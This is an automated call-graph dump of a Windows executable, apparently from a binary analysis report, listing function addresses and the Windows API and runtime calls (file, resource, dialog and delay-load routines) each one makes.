20972 7ff7f4d68277 21003 7ff7f4d652c0 33 API calls 2 library calls 20972->21003 20974 7ff7f4d61b70 31 API calls 20977 7ff7f4d68690 20974->20977 20976 7ff7f4d6861d memcpy_s 20976->20953 20976->20974 20979 7ff7f4d61b70 31 API calls 20977->20979 20983 7ff7f4d684c5 20978->20983 21004 7ff7f4d61734 33 API calls 4 library calls 20978->21004 20982 7ff7f4d6869a 20979->20982 20981 7ff7f4d61b70 31 API calls 20986 7ff7f4d68311 20981->20986 20987 7ff7f4d61b70 31 API calls 20982->20987 20983->20968 20984 7ff7f4d612bc 33 API calls 20983->20984 20988 7ff7f4d68566 20984->20988 20985 7ff7f4d6828d memcpy_s 20985->20952 20985->20981 20989 7ff7f4d61b70 31 API calls 20986->20989 20987->20992 20990 7ff7f4d61c04 33 API calls 20988->20990 20989->20992 20991 7ff7f4d68583 20990->20991 20993 7ff7f4d61b70 31 API calls 20991->20993 20992->20935 20992->20936 20992->20940 20992->20947 20993->20992 20995 7ff7f4d6709d 20994->20995 20996 7ff7f4d670b2 memcpy_s 20994->20996 20995->20996 20997 7ff7f4d6715d 20995->20997 21000 7ff7f4d670e4 20995->21000 20996->20942 21011 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 20997->21011 21000->20996 21001 7ff7f4d85aa0 4 API calls 21000->21001 21001->20996 21002->20972 21003->20985 21004->20983 21005->20961 21006->20976 21019 7ff7f4d69a38 21012->21019 21015 7ff7f4d69bd9 21017 7ff7f4d85bf0 _handle_error 8 API calls 21015->21017 21018 7ff7f4d69bf2 21017->21018 21018->20861 21018->20862 21020 7ff7f4d69a92 21019->21020 21028 7ff7f4d69b30 21019->21028 21022 7ff7f4d69ac0 21020->21022 21033 7ff7f4d70644 WideCharToMultiByte 21020->21033 21027 7ff7f4d69aef 21022->21027 21035 7ff7f4d6ae88 45 API calls 2 library calls 21022->21035 21023 7ff7f4d85bf0 _handle_error 8 API calls 21024 7ff7f4d69b64 21023->21024 21024->21015 21029 7ff7f4d69c00 21024->21029 21036 7ff7f4d8d5ec 31 API calls 2 library calls 21027->21036 21028->21023 21030 7ff7f4d69c69 21029->21030 21031 7ff7f4d69c40 21029->21031 21030->21015 21037 7ff7f4d8d5ec 31 API calls 2 library calls 21031->21037 21034 7ff7f4d70686 21033->21034 21034->21022 21035->21027 21036->21028 21037->21030 21054 7ff7f4d6d3f8 21038->21054 21043 7ff7f4d6d8cb 21046 7ff7f4d6d93f 21043->21046 21048 7ff7f4d6d967 21043->21048 21044 7ff7f4d6d80d swprintf 21051 7ff7f4d6d89c 21044->21051 21068 7ff7f4d8d308 21044->21068 21095 7ff7f4d63550 33 API calls 21044->21095 21047 7ff7f4d85bf0 _handle_error 8 API calls 21046->21047 21049 7ff7f4d6d953 21047->21049 21050 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21048->21050 21049->20799 21052 7ff7f4d6d96c 21050->21052 21051->21043 21096 7ff7f4d63550 33 API calls 21051->21096 21055 7ff7f4d6d58d 21054->21055 21057 7ff7f4d6d42a 21054->21057 21058 7ff7f4d6ca18 21055->21058 21056 7ff7f4d61734 33 API calls 21056->21057 21057->21055 21057->21056 21059 7ff7f4d6ca4e 21058->21059 21065 7ff7f4d6cb18 21058->21065 21062 7ff7f4d6cab8 21059->21062 21063 7ff7f4d6cb13 21059->21063 21067 7ff7f4d6ca5e 21059->21067 21066 7ff7f4d85aa0 4 API calls 21062->21066 21062->21067 21097 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 21063->21097 21098 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 21065->21098 21066->21067 21067->21044 21069 7ff7f4d8d366 21068->21069 21070 7ff7f4d8d34e 21068->21070 21069->21070 21071 7ff7f4d8d370 21069->21071 21099 7ff7f4d90b6c 15 API calls _set_errno_from_matherr 21070->21099 21101 7ff7f4d8b308 35 API calls 2 library calls 21071->21101 21074 7ff7f4d8d353 21100 7ff7f4d8ae34 31 API calls _invalid_parameter_noinfo_noreturn 21074->21100 21076 7ff7f4d85bf0 _handle_error 8 API calls 21078 7ff7f4d8d523 21076->21078 21077 7ff7f4d8d381 memcpy_s 21102 7ff7f4d8b288 15 API calls _set_errno_from_matherr 21077->21102 21078->21044 21080 7ff7f4d8d3ec 21103 7ff7f4d8b710 46 API calls 3 library calls 21080->21103 21082 7ff7f4d8d3f5 21083 7ff7f4d8d42c 21082->21083 21084 7ff7f4d8d3fd 21082->21084 21086 7ff7f4d8d4aa 21083->21086 21087 7ff7f4d8d43b 21083->21087 21088 7ff7f4d8d432 21083->21088 21089 7ff7f4d8d484 21083->21089 21104 7ff7f4d90ddc 21084->21104 21086->21089 21090 7ff7f4d8d4b4 21086->21090 21091 7ff7f4d90ddc __free_lconv_mon 15 API calls 21087->21091 21088->21087 21088->21089 21092 7ff7f4d90ddc __free_lconv_mon 15 API calls 21089->21092 21093 7ff7f4d90ddc __free_lconv_mon 15 API calls 21090->21093 21094 7ff7f4d8d35e 21091->21094 21092->21094 21093->21094 21094->21076 21095->21044 21096->21043 21099->21074 21100->21094 21101->21077 21102->21080 21103->21082 21105 7ff7f4d90de1 RtlRestoreThreadPreferredUILanguages 21104->21105 21109 7ff7f4d90e11 __free_lconv_mon 21104->21109 21106 7ff7f4d90dfc 21105->21106 21105->21109 21110 7ff7f4d90b6c 15 API calls _set_errno_from_matherr 21106->21110 21108 7ff7f4d90e01 GetLastError 21108->21109 21109->21094 21110->21108 21113->20599 21117 7ff7f4d7c24b SizeofResource 21116->21117 21121 7ff7f4d7c397 21116->21121 21118 7ff7f4d7c265 LoadResource 21117->21118 21117->21121 21119 7ff7f4d7c27e LockResource 21118->21119 21118->21121 21120 7ff7f4d7c293 GlobalAlloc 21119->21120 21119->21121 21120->21121 21122 7ff7f4d7c2b4 GlobalLock 21120->21122 21121->20636 21123 7ff7f4d7c38e GlobalFree 21122->21123 21125 7ff7f4d7c2c6 memcpy_s 21122->21125 21123->21121 21124 7ff7f4d7c385 GlobalUnlock 21124->21123 21125->21124 21126 7ff7f4d7c356 GdipCreateHBITMAPFromBitmap 21125->21126 21127 7ff7f4d7c36e 21125->21127 21126->21127 21127->21124 21129 7ff7f4d7c11c 4 API calls 21128->21129 21130 7ff7f4d7c0fa 21129->21130 21131 7ff7f4d7c109 21130->21131 21139 7ff7f4d7c154 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21130->21139 21131->20642 21131->20643 21131->20644 21133->20647 21135 7ff7f4d7c12e 21134->21135 21136 7ff7f4d7c133 21134->21136 21140 7ff7f4d7c18c GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21135->21140 21138 7ff7f4d7c9f0 16 API calls _handle_error 21136->21138 21138->20652 21139->21131 21140->21136 21144 7ff7f4d69cfe _snwprintf 21141->21144 21142 7ff7f4d69d73 21259 7ff7f4d6806c 48 API calls 21142->21259 21144->21142 21146 7ff7f4d69e89 21144->21146 21145 7ff7f4d61b70 31 API calls 21148 7ff7f4d69dfd 21145->21148 21146->21148 21151 7ff7f4d61c80 33 API calls 21146->21151 21147 7ff7f4d69d7d memcpy_s 21147->21145 21149 7ff7f4d6a82e 21147->21149 21210 7ff7f4d646a0 21148->21210 21150 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21149->21150 21152 7ff7f4d6a834 21150->21152 21151->21148 21156 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21152->21156 21155 7ff7f4d69e22 21158 7ff7f4d6424c 100 API calls 21155->21158 21159 7ff7f4d6a83a 21156->21159 21157 7ff7f4d69f17 21228 7ff7f4d8d7c0 21157->21228 21160 7ff7f4d69e2b 21158->21160 21160->21152 21163 7ff7f4d69e66 21160->21163 21162 7ff7f4d69ead 21162->21157 21168 7ff7f4d69254 33 API calls 21162->21168 21166 7ff7f4d85bf0 _handle_error 8 API calls 21163->21166 21165 7ff7f4d8d7c0 31 API calls 21179 7ff7f4d69f57 __vcrt_FlsAlloc 21165->21179 21167 7ff7f4d6a80e 21166->21167 21167->20655 21168->21162 21169 7ff7f4d6a089 21171 7ff7f4d64c40 101 API calls 21169->21171 21182 7ff7f4d6a15c 21169->21182 21173 7ff7f4d6a0a1 21171->21173 21174 7ff7f4d64a70 104 API calls 21173->21174 21173->21182 21180 7ff7f4d6a0c9 21174->21180 21179->21169 21179->21182 21236 7ff7f4d64d50 21179->21236 21245 7ff7f4d64a70 21179->21245 21250 7ff7f4d64c40 21179->21250 21180->21182 21203 7ff7f4d6a0d7 __vcrt_FlsAlloc 21180->21203 21260 7ff7f4d702f8 MultiByteToWideChar 21180->21260 21255 7ff7f4d6424c 21182->21255 21183 7ff7f4d6a5ec 21193 7ff7f4d6a6c2 21183->21193 21266 7ff7f4d90458 31 API calls 2 library calls 21183->21266 21185 7ff7f4d6a557 21185->21183 21263 7ff7f4d90458 31 API calls 2 library calls 21185->21263 21188 7ff7f4d6a54b 21188->20655 21189 7ff7f4d6a6ae 21189->21193 21268 7ff7f4d690cc 33 API calls Concurrency::cancel_current_task 21189->21268 21190 7ff7f4d6a649 21267 7ff7f4d8ec84 31 API calls _invalid_parameter_noinfo_noreturn 21190->21267 21191 7ff7f4d6a7a2 21192 7ff7f4d8d7c0 31 API calls 21191->21192 21195 7ff7f4d6a7cb 21192->21195 21193->21191 21199 7ff7f4d69254 33 API calls 21193->21199 21197 7ff7f4d8d7c0 31 API calls 21195->21197 21196 7ff7f4d6a56d 21264 7ff7f4d8ec84 31 API calls _invalid_parameter_noinfo_noreturn 21196->21264 21197->21182 21199->21193 21200 7ff7f4d6a5d8 21200->21183 21265 7ff7f4d690cc 33 API calls Concurrency::cancel_current_task 21200->21265 21202 7ff7f4d6a829 21269 7ff7f4d85db4 8 API calls 21202->21269 21203->21182 21203->21183 21203->21185 21203->21188 21203->21202 21205 7ff7f4d70644 WideCharToMultiByte 21203->21205 21261 7ff7f4d6ae88 45 API calls 2 library calls 21203->21261 21262 7ff7f4d8d5ec 31 API calls 2 library calls 21203->21262 21205->21203 21209 7ff7f4d6a868 21208->21209 21209->20657 21211 7ff7f4d646dd CreateFileW 21210->21211 21213 7ff7f4d6478e GetLastError 21211->21213 21221 7ff7f4d6484e 21211->21221 21214 7ff7f4d680b0 49 API calls 21213->21214 21215 7ff7f4d647bc 21214->21215 21216 7ff7f4d647c0 CreateFileW GetLastError 21215->21216 21222 7ff7f4d6480c 21215->21222 21216->21222 21217 7ff7f4d64891 SetFileTime 21220 7ff7f4d648af 21217->21220 21218 7ff7f4d648e8 21219 7ff7f4d85bf0 _handle_error 8 API calls 21218->21219 21223 7ff7f4d648fb 21219->21223 21220->21218 21224 7ff7f4d61c80 33 API calls 21220->21224 21221->21217 21221->21220 21222->21221 21225 7ff7f4d64916 21222->21225 21223->21155 21223->21162 21224->21218 21226 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21225->21226 21227 7ff7f4d6491b 21226->21227 21229 7ff7f4d8d7ed 21228->21229 21235 7ff7f4d8d802 21229->21235 21270 7ff7f4d90b6c 15 API calls _set_errno_from_matherr 21229->21270 21231 7ff7f4d8d7f7 21271 7ff7f4d8ae34 31 API calls _invalid_parameter_noinfo_noreturn 21231->21271 21232 7ff7f4d85bf0 _handle_error 8 API calls 21234 7ff7f4d69f37 21232->21234 21234->21165 21235->21232 21237 7ff7f4d64d6d 21236->21237 21238 7ff7f4d64d89 21236->21238 21239 7ff7f4d64d9b 21237->21239 21272 7ff7f4d63eac 99 API calls Concurrency::cancel_current_task 21237->21272 21238->21239 21240 7ff7f4d64da1 SetFilePointer 21238->21240 21239->21179 21240->21239 21242 7ff7f4d64dbe GetLastError 21240->21242 21242->21239 21243 7ff7f4d64dc8 21242->21243 21243->21239 21273 7ff7f4d63eac 99 API calls Concurrency::cancel_current_task 21243->21273 21246 7ff7f4d64a9d 21245->21246 21247 7ff7f4d64a96 21245->21247 21246->21247 21249 7ff7f4d64520 GetStdHandle ReadFile GetLastError GetLastError GetFileType 21246->21249 21274 7ff7f4d63d8c 99 API calls Concurrency::cancel_current_task 21246->21274 21247->21179 21249->21246 21275 7ff7f4d6491c 21250->21275 21253 7ff7f4d64c67 21253->21179 21256 7ff7f4d64266 21255->21256 21257 7ff7f4d64272 21255->21257 21256->21257 21283 7ff7f4d642d0 21256->21283 21259->21147 21260->21203 21261->21203 21262->21203 21263->21196 21264->21200 21265->21183 21266->21190 21267->21189 21268->21193 21269->21149 21270->21231 21271->21235 21279 7ff7f4d6492d _snwprintf 21275->21279 21276 7ff7f4d64959 21278 7ff7f4d85bf0 _handle_error 8 API calls 21276->21278 21277 7ff7f4d64a34 SetFilePointer 21277->21276 21281 7ff7f4d64a5c GetLastError 21277->21281 21280 7ff7f4d649c1 21278->21280 21279->21276 21279->21277 21280->21253 21282 7ff7f4d63eac 99 API calls Concurrency::cancel_current_task 21280->21282 21281->21276 21284 7ff7f4d642ea 21283->21284 21285 7ff7f4d64302 21283->21285 21284->21285 21287 7ff7f4d642f6 FindCloseChangeNotification 21284->21287 21286 7ff7f4d64326 21285->21286 21289 7ff7f4d63a64 99 API calls 21285->21289 21286->21257 21287->21285 21289->21286 21290->20663 21292->20677 21426 7ff7f4d79c09 8 API calls _handle_error 21446 7ff7f4d84d10 21448 7ff7f4d84c43 21446->21448 21447 7ff7f4d85350 _com_raise_error 14 API calls 21447->21448 21448->21447 21463 7ff7f4d700dc 21464 7ff7f4d83c58 21463->21464 21465 7ff7f4d83c97 21464->21465 21466 7ff7f4d83d0f 21464->21466 21467 7ff7f4d6aee0 48 API calls 21465->21467 21468 7ff7f4d6aee0 48 API calls 21466->21468 21469 7ff7f4d83cab 21467->21469 21470 7ff7f4d83d23 21468->21470 21471 7ff7f4d6d9c0 48 API calls 21469->21471 21472 7ff7f4d6d9c0 48 API calls 21470->21472 21476 7ff7f4d83cba memcpy_s 21471->21476 21472->21476 21473 7ff7f4d61b70 31 API calls 21474 7ff7f4d83db9 21473->21474 21489 7ff7f4d6210c 21474->21489 21475 7ff7f4d83e44 21480 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21475->21480 21476->21473 21476->21475 21477 7ff7f4d83e3e 21476->21477 21479 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21477->21479 21479->21475 21482 7ff7f4d83e4a 21480->21482 21490 7ff7f4d62113 21489->21490 21491 7ff7f4d62116 SetDlgItemTextW 21489->21491 21490->21491 22720 7ff7f4d99af0 22721 7ff7f4d99b0e 22720->22721 22722 7ff7f4d87808 Concurrency::cancel_current_task 2 API calls 22721->22722 22723 7ff7f4d99b17 22722->22723 22736 7ff7f4d70d48 31 API calls 22723->22736 22725 7ff7f4d99b3c 22726 7ff7f4d87808 Concurrency::cancel_current_task 2 API calls 22725->22726 22727 7ff7f4d99b5c 22726->22727 22737 7ff7f4d70d7c 31 API calls 22727->22737 22729 7ff7f4d99b7b 22738 7ff7f4d722b0 22729->22738 22736->22725 22737->22729 22739 7ff7f4d722c7 22738->22739 22740 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22739->22740 22741 7ff7f4d722f0 22740->22741 22742 7ff7f4d612bc 33 API calls 22741->22742 22743 7ff7f4d723c7 22742->22743 22744 7ff7f4d700d0 83 API calls 22743->22744 22745 7ff7f4d723db 22744->22745 22746 7ff7f4d61b70 31 API calls 22745->22746 22747 7ff7f4d723e5 22746->22747 22748 7ff7f4d85aa0 4 API calls 22747->22748 22749 7ff7f4d72449 22748->22749 22754 7ff7f4d71294 31 API calls 22749->22754 22751 7ff7f4d73d62 22755 7ff7f4d71a38 31 API calls _invalid_parameter_noinfo_noreturn 22751->22755 22753 7ff7f4d73d7a 22754->22751 22755->22753 22939 7ff7f4d84ef2 22940 7ff7f4d85350 _com_raise_error 14 API calls 22939->22940 22941 7ff7f4d84f31 22940->22941 21296 7ff7f4d747b8 21309 7ff7f4d68e0c 21296->21309 21300 7ff7f4d748d1 21302 7ff7f4d85bf0 _handle_error 8 API calls 21300->21302 21301 7ff7f4d7482e 21301->21300 21303 7ff7f4d748fe 21301->21303 21304 7ff7f4d748f9 21301->21304 21305 7ff7f4d748e4 21302->21305 21306 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21303->21306 21307 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21304->21307 21308 7ff7f4d74904 21306->21308 21307->21303 21310 7ff7f4d68e49 21309->21310 21312 7ff7f4d68e32 21309->21312 21320 7ff7f4d63550 33 API calls 21310->21320 21313 7ff7f4d66288 21312->21313 21321 7ff7f4d6885c 21313->21321 21316 7ff7f4d662cf 21316->21301 21319 7ff7f4d662ba FindClose 21319->21316 21320->21312 21322 7ff7f4d6887a 21321->21322 21351 7ff7f4d6367c 21322->21351 21325 7ff7f4d6647c 21326 7ff7f4d664b9 FindFirstFileW 21325->21326 21327 7ff7f4d66592 FindNextFileW 21325->21327 21329 7ff7f4d665b3 21326->21329 21331 7ff7f4d664de 21326->21331 21327->21329 21330 7ff7f4d665a1 GetLastError 21327->21330 21332 7ff7f4d665d1 21329->21332 21335 7ff7f4d61c80 33 API calls 21329->21335 21349 7ff7f4d66580 21330->21349 21333 7ff7f4d680b0 49 API calls 21331->21333 21340 7ff7f4d612bc 33 API calls 21332->21340 21334 7ff7f4d66504 21333->21334 21337 7ff7f4d66508 FindFirstFileW 21334->21337 21338 7ff7f4d66527 21334->21338 21335->21332 21336 7ff7f4d85bf0 _handle_error 8 API calls 21339 7ff7f4d662b4 21336->21339 21337->21338 21338->21329 21342 7ff7f4d6656f GetLastError 21338->21342 21344 7ff7f4d666d4 21338->21344 21339->21316 21339->21319 21341 7ff7f4d665fb 21340->21341 21343 7ff7f4d68dc4 47 API calls 21341->21343 21342->21349 21345 7ff7f4d66609 21343->21345 21346 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21344->21346 21348 7ff7f4d666cf 21345->21348 21345->21349 21347 7ff7f4d666da 21346->21347 21350 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21348->21350 21349->21336 21350->21344 21354 7ff7f4d636c6 memcpy_s 21351->21354 21352 7ff7f4d85bf0 _handle_error 8 API calls 21353 7ff7f4d6378a 21352->21353 21353->21316 21353->21325 21354->21352 21357 7ff7f4d859c0 21358 7ff7f4d859d6 _com_error::_com_error 21357->21358 21363 7ff7f4d87808 21358->21363 21360 7ff7f4d859e7 21368 7ff7f4d85350 21360->21368 21364 7ff7f4d87827 21363->21364 21365 7ff7f4d87844 RtlPcToFileHeader 21363->21365 21364->21365 21366 7ff7f4d8785c 21365->21366 21367 7ff7f4d8786b RaiseException 21365->21367 21366->21367 21367->21360 21394 7ff7f4d84fa8 21368->21394 21371 7ff7f4d853db 21372 7ff7f4d852b8 DloadReleaseSectionWriteAccess 6 API calls 21371->21372 21373 7ff7f4d853e8 RaiseException 21372->21373 21374 7ff7f4d85605 21373->21374 21375 7ff7f4d85404 21376 7ff7f4d8548d LoadLibraryExA 21375->21376 21377 7ff7f4d855d5 21375->21377 21378 7ff7f4d854f9 21375->21378 21381 7ff7f4d8550d 21375->21381 21376->21378 21379 7ff7f4d854a4 GetLastError 21376->21379 21402 7ff7f4d852b8 21377->21402 21380 7ff7f4d85504 FreeLibrary 21378->21380 21378->21381 21383 7ff7f4d854ce 21379->21383 21384 7ff7f4d854b9 21379->21384 21380->21381 21381->21377 21382 7ff7f4d8556b GetProcAddress 21381->21382 21382->21377 21387 7ff7f4d85580 GetLastError 21382->21387 21386 7ff7f4d852b8 DloadReleaseSectionWriteAccess 6 API calls 21383->21386 21384->21378 21384->21383 21388 7ff7f4d854db RaiseException 21386->21388 21389 7ff7f4d85595 21387->21389 21388->21374 21389->21377 21390 7ff7f4d852b8 DloadReleaseSectionWriteAccess 6 API calls 21389->21390 21391 7ff7f4d855b7 RaiseException 21390->21391 21392 7ff7f4d84fa8 DloadAcquireSectionWriteAccess 6 API calls 21391->21392 21393 7ff7f4d855d1 21392->21393 21393->21377 21395 7ff7f4d84fbe 21394->21395 21396 7ff7f4d85023 21394->21396 21410 7ff7f4d85054 21395->21410 21396->21371 21396->21375 21399 7ff7f4d8501e 21401 7ff7f4d85054 DloadAcquireSectionWriteAccess 3 API calls 21399->21401 21401->21396 21403 7ff7f4d852c8 21402->21403 21409 7ff7f4d85321 21402->21409 21404 7ff7f4d85054 DloadAcquireSectionWriteAccess 3 API calls 21403->21404 21405 7ff7f4d852cd 21404->21405 21406 7ff7f4d8531c 21405->21406 21407 7ff7f4d85228 DloadProtectSection 3 API calls 21405->21407 21408 7ff7f4d85054 DloadAcquireSectionWriteAccess 3 API calls 21406->21408 21407->21406 21408->21409 21409->21374 21411 7ff7f4d84fc3 21410->21411 21412 7ff7f4d8506f 21410->21412 21411->21399 21417 7ff7f4d85228 21411->21417 21412->21411 21413 7ff7f4d85074 GetModuleHandleW 21412->21413 21414 7ff7f4d8508e GetProcAddress 21413->21414 21415 7ff7f4d85089 21413->21415 21414->21415 21416 7ff7f4d850a3 GetProcAddress 21414->21416 21415->21411 21416->21415 21418 7ff7f4d8524a DloadProtectSection 21417->21418 21419 7ff7f4d85252 21418->21419 21420 7ff7f4d8528a VirtualProtect 21418->21420 21422 7ff7f4d850f4 VirtualQuery GetSystemInfo 21418->21422 21419->21399 21420->21419 21422->21420 21432 7ff7f4d8f3cc 21439 7ff7f4d90430 21432->21439 21444 7ff7f4d90910 35 API calls 2 library calls 21439->21444 21441 7ff7f4d9043b 21445 7ff7f4d90530 35 API calls abort 21441->21445 21444->21441 21504 7ff7f4d7eca0 21847 7ff7f4d6215c 21504->21847 21506 7ff7f4d7eceb 21507 7ff7f4d7f9a3 21506->21507 21508 7ff7f4d7ecff 21506->21508 21654 7ff7f4d7ed1c 21506->21654 22097 7ff7f4d82ea0 21507->22097 21512 7ff7f4d7ed0f 21508->21512 21517 7ff7f4d7edeb 21508->21517 21508->21654 21511 7ff7f4d85bf0 _handle_error 8 API calls 21515 7ff7f4d7fe60 21511->21515 21516 7ff7f4d7ed17 21512->21516 21522 7ff7f4d7edb9 21512->21522 21513 7ff7f4d7f9ca IsDlgButtonChecked 21514 7ff7f4d7f9d9 21513->21514 21520 7ff7f4d7f9e5 SendDlgItemMessageW 21514->21520 21521 7ff7f4d7fa00 GetDlgItem IsDlgButtonChecked 21514->21521 21527 7ff7f4d6aee0 48 API calls 21516->21527 21516->21654 21518 7ff7f4d7eea1 21517->21518 21524 7ff7f4d7ee05 21517->21524 21855 7ff7f4d61ebc GetDlgItem 21518->21855 21520->21521 21526 7ff7f4d67a28 35 API calls 21521->21526 21523 7ff7f4d7eddb EndDialog 21522->21523 21522->21654 21523->21654 21528 7ff7f4d6aee0 48 API calls 21524->21528 21529 7ff7f4d7fa57 GetDlgItem 21526->21529 21530 7ff7f4d7ed46 21527->21530 21531 7ff7f4d7ee23 SetDlgItemTextW 21528->21531 22116 7ff7f4d62120 21529->22116 22119 7ff7f4d61a94 34 API calls _handle_error 21530->22119 21536 7ff7f4d7ee36 21531->21536 21534 7ff7f4d7ef18 GetDlgItem 21537 7ff7f4d7ef32 IsDlgButtonChecked IsDlgButtonChecked 21534->21537 21538 7ff7f4d7ef5f SetFocus 21534->21538 21535 7ff7f4d7ef05 21551 7ff7f4d7f7d5 21535->21551 21675 7ff7f4d7eec1 EndDialog 21535->21675 21542 7ff7f4d7ee50 GetMessageW 21536->21542 21536->21654 21537->21538 21543 7ff7f4d7ef75 21538->21543 21544 7ff7f4d7f002 21538->21544 21541 7ff7f4d7ed56 21547 7ff7f4d7ed6c 21541->21547 21554 7ff7f4d6210c SetDlgItemTextW 21541->21554 21549 7ff7f4d7ee6e IsDialogMessageW 21542->21549 21542->21654 21550 7ff7f4d6aee0 48 API calls 21543->21550 21548 7ff7f4d62314 33 API calls 21544->21548 21545 7ff7f4d7eeea 21552 7ff7f4d61b70 31 API calls 21545->21552 21562 7ff7f4d7fe73 21547->21562 21547->21654 21555 7ff7f4d7f03c 21548->21555 21549->21536 21556 7ff7f4d7ee83 TranslateMessage DispatchMessageW 21549->21556 21557 7ff7f4d7ef7f 21550->21557 21558 7ff7f4d6aee0 48 API calls 21551->21558 21552->21654 21554->21547 21869 7ff7f4d82a90 21555->21869 21556->21536 21571 7ff7f4d612bc 33 API calls 21557->21571 21563 7ff7f4d7f7e6 SetDlgItemTextW 21558->21563 21567 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21562->21567 21566 7ff7f4d6aee0 48 API calls 21563->21566 21572 7ff7f4d7f818 21566->21572 21573 7ff7f4d7fe78 21567->21573 21570 7ff7f4d6aee0 48 API calls 21575 7ff7f4d7f065 21570->21575 21576 7ff7f4d7efa8 21571->21576 21589 7ff7f4d612bc 33 API calls 21572->21589 21582 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21573->21582 21579 7ff7f4d6d9c0 48 API calls 21575->21579 21580 7ff7f4d82bb4 24 API calls 21576->21580 21586 7ff7f4d7f078 21579->21586 21587 7ff7f4d7efb5 21580->21587 21590 7ff7f4d7fe7e 21582->21590 21883 7ff7f4d82bb4 21586->21883 21587->21573 21602 7ff7f4d7eff8 21587->21602 21611 7ff7f4d7f841 21589->21611 21600 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21590->21600 21599 7ff7f4d7f8ea 21604 7ff7f4d6aee0 48 API calls 21599->21604 21605 7ff7f4d7fe84 21600->21605 21601 7ff7f4d7f0fc 21614 7ff7f4d7f12a 21601->21614 22121 7ff7f4d6587c 21601->22121 21602->21601 22120 7ff7f4d83544 33 API calls 2 library calls 21602->22120 21616 7ff7f4d7f8f4 21604->21616 21623 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21605->21623 21608 7ff7f4d61b70 31 API calls 21619 7ff7f4d7f096 21608->21619 21611->21599 21625 7ff7f4d612bc 33 API calls 21611->21625 21897 7ff7f4d6552c 21614->21897 21636 7ff7f4d612bc 33 API calls 21616->21636 21619->21590 21619->21602 21630 7ff7f4d7fe8a 21623->21630 21631 7ff7f4d7f88f 21625->21631 21641 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21630->21641 21637 7ff7f4d6aee0 48 API calls 21631->21637 21634 7ff7f4d7f15c 21909 7ff7f4d68cf8 21634->21909 21635 7ff7f4d7f144 GetLastError 21635->21634 21640 7ff7f4d7f91d 21636->21640 21643 7ff7f4d7f89a 21637->21643 21639 7ff7f4d7f11e 22124 7ff7f4d7d8c8 12 API calls _handle_error 21639->22124 21657 7ff7f4d612bc 33 API calls 21640->21657 21647 7ff7f4d7fe90 21641->21647 22143 7ff7f4d61170 33 API calls memcpy_s 21643->22143 21658 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21647->21658 21650 7ff7f4d7f16e 21655 7ff7f4d7f175 GetLastError 21650->21655 21656 7ff7f4d7f184 21650->21656 21652 7ff7f4d7f8b2 21664 7ff7f4d61c04 33 API calls 21652->21664 21654->21511 21655->21656 21660 7ff7f4d7f22c 21656->21660 21663 7ff7f4d7f23b 21656->21663 21665 7ff7f4d7f19b GetTickCount 21656->21665 21661 7ff7f4d7f95e 21657->21661 21662 7ff7f4d7fe96 21658->21662 21660->21663 21682 7ff7f4d7f689 21660->21682 21677 7ff7f4d61b70 31 API calls 21661->21677 21666 7ff7f4d6215c 61 API calls 21662->21666 21667 7ff7f4d7f560 21663->21667 21672 7ff7f4d67c10 34 API calls 21663->21672 21668 7ff7f4d7f8ce 21664->21668 21912 7ff7f4d65238 21665->21912 21670 7ff7f4d7fef4 21666->21670 21667->21675 22133 7ff7f4d66e5c 21667->22133 21673 7ff7f4d61b70 31 API calls 21668->21673 21678 7ff7f4d7fef8 21670->21678 21685 7ff7f4d7ff99 GetDlgItem SetFocus 21670->21685 21728 7ff7f4d7ff0d 21670->21728 21679 7ff7f4d7f25e 21672->21679 21680 7ff7f4d7f8dc 21673->21680 21675->21545 21684 7ff7f4d7f988 21677->21684 21686 7ff7f4d85bf0 _handle_error 8 API calls 21678->21686 22125 7ff7f4d6bc8c 131 API calls 21679->22125 21688 7ff7f4d61b70 31 API calls 21680->21688 21697 7ff7f4d6aee0 48 API calls 21682->21697 21692 7ff7f4d61b70 31 API calls 21684->21692 21689 7ff7f4d7ffca 21685->21689 21693 7ff7f4d805a7 21686->21693 21688->21599 21705 7ff7f4d612bc 33 API calls 21689->21705 21690 7ff7f4d7f1ca 21696 7ff7f4d61b70 31 API calls 21690->21696 21699 7ff7f4d7f993 21692->21699 21695 7ff7f4d7f278 21704 7ff7f4d6d9c0 48 API calls 21695->21704 21706 7ff7f4d7f1d8 21696->21706 21707 7ff7f4d7f6b7 SetDlgItemTextW 21697->21707 21698 7ff7f4d7f59a 21700 7ff7f4d6aee0 48 API calls 21698->21700 21701 7ff7f4d61b70 31 API calls 21699->21701 21709 7ff7f4d7f5a7 21700->21709 21701->21545 21702 7ff7f4d7ff44 SendDlgItemMessageW 21710 7ff7f4d7ff6d EndDialog 21702->21710 21711 7ff7f4d7ff64 21702->21711 21712 7ff7f4d7f2ba GetCommandLineW 21704->21712 21713 7ff7f4d7ffdc 21705->21713 21922 7ff7f4d64334 21706->21922 21708 7ff7f4d62134 21707->21708 21714 7ff7f4d7f6d5 SetDlgItemTextW GetDlgItem 21708->21714 22142 7ff7f4d61170 33 API calls memcpy_s 21709->22142 21710->21678 21711->21710 21716 7ff7f4d7f379 21712->21716 21717 7ff7f4d7f35f 21712->21717 21718 7ff7f4d68e0c 33 API calls 21713->21718 